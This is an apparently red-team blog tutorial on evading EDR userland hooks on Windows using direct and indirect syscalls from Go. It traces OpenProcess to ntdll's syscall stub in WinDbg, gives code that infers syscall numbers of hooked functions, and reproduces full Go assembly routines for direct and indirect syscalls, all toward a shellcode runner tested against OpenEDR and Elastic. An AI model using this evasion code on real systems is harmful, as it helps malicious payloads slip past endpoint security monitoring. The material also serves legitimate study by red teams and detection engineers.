In the previous section we worked on a piece of code to detect if ntdll.dll was hooked by the EDR installed on the machine.
Once a hook is detected we have a few choices. We could replace the hook bytes with the original bytes by calculating the SSN. This is a similar approach to loading a fresh copy from the disk. The only difference is that we don't remap the whole dll we just unhook the functions of interest. The issue with this approach is that we still have to modify the dll in memory. This includes using the suspicious WinAPIs VirtualProtect(Ex) WriteProcessMemory etc. Another issue with this approach is that theese functions themselves might be hooked.
This is where the Direct and Indirect syscalls come in handy.
What is a syscall ?
Sequence of events when calling windows APIs
Before going into detail on what a syscall is let's analyze the sequence of events that take place when a simple windows API function is called. The following code is used for analysis.
All we do in this code is sleep for 30 seconds , just to have enough time to attach windbg and set our breakpoints get a handle on a process and then close the handle.
When we try to set a breakpoint on kernel32!OpenProcess we get the following error
0:006> bp kernel32!OpenProcessCouldn't resolve error at 'kernel32!OpenProcess'
To list all functions starting with O in kernel32 we use the following command
0:006> x /D /f KERNEL32!o* A B C D E F G H I J K L M N O P Q R S T U V W X Y Z00007ffa`9aa83a32 KERNEL32!OpenFile$fin$0 (void)00007ffa`9aa36330 KERNEL32!OOBEComplete (void)00007ffa`9aa2832c KERNEL32!OpenSortIdKey (void)00007ffa`9aa37e20 KERNEL32!OOBECompleteWnfQueryCallback (void)00007ffa`9aa896c0 KERNEL32!OOBECompleteWnfWaitCallback (void)00007ffa`9aa39260 KERNEL32!OpenFileMappingWStub (OpenFileMappingWStub)00007ffa`9aa40340 KERNEL32!OpenWaitableTimerW (OpenWaitableTimerW)00007ffa`9aa39640 KERNEL32!OutputDebugStringWStub (OutputDebugStringWStub)00007ffa`9aa40300 KERNEL32!OpenEventA (OpenEventA)00007ffa`9aa8b440 KERNEL32!OpenConsoleW (OpenConsoleW)00007ffa`9aa39720 KERNEL32!OutputDebugStringAStub (OutputDebugStringAStub)00007ffa`9aa846b0 KERNEL32!OpenWaitableTimerA (OpenWaitableTimerA)00007ffa`9aa34730 KERNEL32!OpenProcessStub (OpenProcessStub)00007ffa`9aa40310 KERNEL32!OpenEventW (OpenEventW)00007ffa`9aa834e0 KERNEL32!OpenFile (OpenFile)00007ffa`9aa82e70 KERNEL32!OpenPrivateNamespaceA (OpenPrivateNamespaceA)00007ffa`9aa5be60 KERNEL32!OpenConsoleWStub (OpenConsoleWStub)00007ffa`9aa39e00 KERNEL32!OpenProfileUserMapping (OpenProfileUserMapping)00007ffa`9aa845b0 KERNEL32!OpenMutexA (OpenMutexA)00007ffa`9aa7cc50 KERNEL32!OpenJobObjectA (OpenJobObjectA)00007ffa`9aa5be70 KERNEL32!OpenPrivateNamespaceWStub (OpenPrivateNamespaceWStub)00007ffa`9aa40330 KERNEL32!OpenSemaphoreW (OpenSemaphoreW)00007ffa`9aa470e0 KERNEL32!OpenFileMappingA (OpenFileMappingA)00007ffa`9aa7ccd0 KERNEL32!OpenJobObjectW (OpenJobObjectW)00007ffa`9aa84630 KERNEL32!OpenSemaphoreA (OpenSemaphoreA)00007ffa`9aa369b0 KERNEL32!OpenThreadStub (OpenThreadStub)00007ffa`9aa40320 KERNEL32!OpenMutexW (OpenMutexW)00007ffa`9aa46ca0 KERNEL32!OpenFileByIdStub (OpenFileByIdStub)
What we are interested here is to get a break point 00007ffa9aa34730 KERNEL32!OpenProcessStub on line 16. We will then follow execution to understand what happens.
Let's set a breakpoint in windbg using the following command
0:006> bp KERNEL32!OpenProcessStub
Then sending the command g resumes execution until our breakpoint hit.
0:006> gBreakpoint 0 hit*** WARNING: Unable to verify timestamp for C:\Users\ALEXAN~1\AppData\Local\Temp\go-build3312435584\b001\exe\OpenProc.exe
KERNEL32!OpenProcessStub:00007ffa`9aa34730 48ff25490a0700 jmp qword ptr [KERNEL32!_imp_OpenProcess (00007ffa`9aaa5180)] ds:00007ffa`9aaa5180={KERNELBASE!OpenProcess (00007ffa`998bc580)}
The jmp instruction on line 5 directs execution to the address held at 00007ffa`9aaa5180, which is the address of kernelbase!OpenProcess.
0:000> dq 00007ffa`9aaa5180 L1 00007ffa`9aaa5180 00007ffa`998bc5800:000> u 00007ffa`998bc580KERNELBASE!OpenProcess:00007ffa`998bc580 4c8bdc mov r11,rsp00007ffa`998bc583 4883ec68 sub rsp,68h
So far we called the OpenProcess api from kernel32 which forwards our request to kernelbase to execute. So where do syscalls come in?
Let's dig further into the kernelbase where the actual implementation of the OpenProcess function is.
Line 20: we can see another call which eventually takes us to ntdll!NtOpenProcess
NtOpenProcess in the ntdll.dll is where the syscall resides.
00007ffa`9c12f203 b826000000 mov eax,26h00007ffa`9c12f208 f604250803fe7f01 test byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],100007ffa`9c12f210 7503 jne ntdll!NtOpenProcess+0x15 (00007ffa`9c12f215)00007ffa`9c12f212 0f05 syscall00007ffa`9c12f214 c3 ret00007ffa`9c12f215 cd2e int 2Eh00007ffa`9c12f217 c3 ret
So here comes the question again. What is a syscall and what does it actually do ?
Under the hood, when a user-mode application calls one of these API functions, the Windows kernel handles the actual system call invocation. The transition from user mode to kernel mode is typically managed through a mechanism called a software interrupt or a similar mechanism.
So in order to get a handle on a process all we don't really have to call either of the three functions. All we have to do is follow the x64 calling convention to prepare our registers and the stack move 0x26 (for this particular version of windows) to eax and call the syscall instruction.
The benefit of directly (or indirectly) calling the syscall instruction is that any EDR that relies on userland hooks for detection will be bypassed.
Direct or Indirect Syscalls.
Direct Syscalls
What "direct syscalls" means is that an asm function is written within our executable that calls the syscall instruction directly. Since syscalls are only called from ntdll.dll any calls coming from any other module should be malicious or at least flagged as anomalous.
Direct Syscalls have served us well. One of the early articles I remember reading regarding syscalls was this one from outflank written back in 2019. Although direct syscalls are effective to this day EDR vendors started catching up with the technique (elastic detection of Direct Syscall via Assembly Bytes).
The detection essentially checks if the following sequence of instructions is called from any other module other than ntdll. If that's the case it's flagged as malicious.
mov r10,rcx;
mov eax,ssn;
syscall;
Indirect Syscalls
The easiest way around this detection is to find the location of syscall within ntdll.dll and instead of directly calling syscall in our assembly function we instead use the call instruction to call the address within the ntdll that holds syscall. In our example above the function will look something like this:
mov r10,rcx;
mov eax,ssn;
call addr;
In the previous blog we stored an address value in a variable called "trampoline". The trampoline variable was the syscall instruction address for each exported function of the ntdll.
With all the knowledge we have now let's write the shellcode runner using both direct and indirect syscalls.
Shellcode Runner using direct and indirect syscalls
Before we start writing our shellcode runner we need to modify our code first to perform the following:
Calculate the SSNs of the hooked functions using the adjacent unhooked functions
We can do this by sorting all functions by their address
The SSNs are sequential for both Zw and Nt functions
Find the last unhooked function and extrapolate the values
Develop the assembly functions to call the syscalls / indirect syscalls
Write wrapper functions to call from our golang main function
Let's continue from where we left off.
Calculate the SSNs of the hooked functions using the adjacent unhooked functions
It is fairly easy to find the unhooked values since we keep our values in a slice. We will loop through the values in the slice and if a function is hooked we will increase the SSN of the previous value by 1.
Here is the unhooking function.
for i, fun :=range dll.exportedNtFunctions {if fun.isHooked { dll.exportedNtFunctions[i].syscallno = dll.exportedNtFunctions[i-1].syscallno +1 dll.exportedNtFunctions[i].isHooked =false } }
As mentioned earlier we could restore the value in memory but that would require changing memory permissions therefore more opportunities for the defenders to be alerted.
In our main function we run the UnhookFuncs function and print the exports again on the host running OpenEDR.
Let's cross check that the value 0x33 if it's the correct SSN for NtOpenFile from another identical windows host not running an EDR.
We have programmatically managed to get the correct SSN values of the hooked functions. We are now ready to start building the assembly functions that perform direct and indirect syscalls.
Assembly Functions
Since writing assembly is not the aim of this blog post I will not go in too much detail about it. If this is a subject of interest you can review the go documentation and the plan 9 assembler manual. Also keep an eye out for my upcoming goASM blog.
For the sake of simplicity we will take the ASM functions from two existing projects.
Direct Syscall Function from BananaPhone Project is located here
Indirect Syscall Function from acheron project is located here
Both of these functions are essentially modified versions of the Golang function (asmstdcall) used to perform windows API calls.
Let's have a quick look at the direct syscall function
//based on https://golang.org/src/runtime/sys_windows_amd64.s
#define maxargs 16
//func Syscall(callid uint16, argh ...uintptr) (uint32, error)
TEXT ·bpSyscall(SB), $0-56
XORQ AX,AX
MOVW callid+0(FP), AX
PUSHQ CX
//put variadic size into CX
MOVQ argh_len+16(FP),CX
//put variadic pointer into SI
MOVQ argh_base+8(FP),SI
// SetLastError(0).
MOVQ 0x30(GS), DI
MOVL $0, 0x68(DI)
SUBQ $(maxargs*8), SP // room for args
// Fast version, do not store args on the stack.
CMPL CX, $4
JLE loadregs
// Check we have enough room for args.
CMPL CX, $maxargs
JLE 2(PC)
INT $3 // not enough room -> crash
// Copy args to the stack.
MOVQ SP, DI
CLD
REP; MOVSQ
MOVQ SP, SI
loadregs:
//move the stack pointer????? why????
SUBQ $8, SP
// Load first 4 args into correspondent registers.
MOVQ 0(SI), CX
MOVQ 8(SI), DX
MOVQ 16(SI), R8
MOVQ 24(SI), R9
// Floating point arguments are passed in the XMM
// registers. Set them here in case any of the arguments
// are floating point values. For details see
// https://msdn.microsoft.com/en-us/library/zthk2dkh.aspx
MOVQ CX, X0
MOVQ DX, X1
MOVQ R8, X2
MOVQ R9, X3
//MOVW callid+0(FP), AX
MOVQ CX, R10
SYSCALL
ADDQ $((maxargs+1)*8), SP
// Return result.
POPQ CX
MOVL AX, errcode+32(FP)
RET
Before we dive into the assembly let's not the main differences between Go Asm and what we will see in windbg (intel syntax)
The function receives a uint16 as an argument. That is the SSN of the syscall we want to perform. The rest of the uintptrs are the arguments passed to the function
Line 5 sets the RAX register to 0 by performing the xor operation.
Line 6 moves the value of the first argument to RAX essentially recreating the mov eax,33 we have seen in the ntdll exported functions.
Line 7 takes the number of arguments into RCX.
Lines 17-45: It basically checks how many arguments were passed to the function and follows the x64 calling convention. First 4 arguments passed to the registers RCX, RDX,R8,R9 and the rest are stored in the stack.
Line 46 is where the syscall instruction is called.
The indirect syscall function is very similar:
// func execIndirectSyscall(ssn uint16, trampoline uintptr, argh ...uintptr) uint32
TEXT ·execIndirectSyscall(SB),NOSPLIT, $0-40
XORQ AX, AX
MOVW ssn+0(FP), AX
XORQ R11, R11
MOVQ trampoline+8(FP), R11
PUSHQ CX
//put variadic pointer into SI
MOVQ argh_base+16(FP),SI
//put variadic size into CX
MOVQ argh_len+24(FP),CX
// SetLastError(0).
MOVQ 0x30(GS), DI
MOVL $0, 0x68(DI)
// room for args
SUBQ $(maxargs*8), SP
//no parameters, special case
CMPL CX, $0
JLE jumpcall
// Fast version, do not store args on the stack.
CMPL CX, $4
JLE loadregs
// Check we have enough room for args.
CMPL CX, $maxargs
JLE 2(PC)
// not enough room -> crash
INT $3
// Copy args to the stack.
MOVQ SP, DI
CLD
REP; MOVSQ
MOVQ SP, SI
loadregs:
// Load first 4 args into correspondent registers.
MOVQ 0(SI), CX
MOVQ 8(SI), DX
MOVQ 16(SI), R8
MOVQ 24(SI), R9
// Floating point arguments are passed in the XMM registers
// Set them here in case any of the arguments are floating point values.
// For details see: https://msdn.microsoft.com/en-us/library/zthk2dkh.aspx
MOVQ CX, X0
MOVQ DX, X1
MOVQ R8, X2
MOVQ R9, X3
jumpcall:
MOVQ CX, R10
//jump to syscall;ret gadget address instead of direct syscall
CALL R11
ADDQ $((maxargs)*8), SP
// Return result
POPQ CX
MOVL AX, errcode+40(FP)
RET
The main differences are:
In addition to the ssn it receives a trampoline argument which is the address of the syscall;ret; located in ntdll.dll
Line 7: The trampoline addess is stored in R11 register
Line 65: Instead of syscall of using the syscall instruction we use the CALL R11 instruction that calls the syscall in ntdll.dll
Wrapper Functions for our assembly functions
In order to be able to call the assembly functions in go we need to save them in the same directory as our code. Since our functions will only work on x64 the name should end with amd64.s. If a 32bit implementation of the function was present we would have to create a separate file ending with _i386.s . That's letting the compiler know the architecture of the assembly functions.
In our code we should also define the functions without a body
That's all needed before we can call the functions.
We will then write a wrapper function that receives the ntapi function as a string and the function arguments. It will then resolve the ssn and trampoline as needed before calling our assembly function.
Let's write the functions one by one. At this point using direct or indirect syscalls has no difference at all. We just have to call the respective function(IndirectSyscall or Syscall) and the code will do the work for us. We will run both implementations against openEDR and elasticEDR to see if any alerts are generated.
The allocated address is stored at the BaseAddress variable defined before the syscall.
The easiest way to debug if our stack / registers are correct before the syscall is to set up a break point just before the syscall. An easy way to find the address of a function in golang is using the following code which prints the address of the IndirectSyscall() in memory. The the sleep function will give us enough time to attach to process and set our breakpoints.
var ptr uintptr= reflect.ValueOf(IndirectSyscall).Pointer() fmt.Printf("0x%x", ptr) time.Sleep(30*time.Second)
In the main function we add the following code to call our wrapper function:
All registers are 64 bit, but instructions access low-order 8, 16 and 32 bits. For example, MOVL to AX puts a value in the low-order 32 bits and clears the top 32 bits to zero.
RAX is the 64-bit general-purpose register.
EAX is the 32-bit general-purpose register, and in 64-bit mode, it's the lower 32 bits of RAX.
AX is the 16-bit version of the register, and in 64-bit mode, it's the lower 16 bits of RAX.
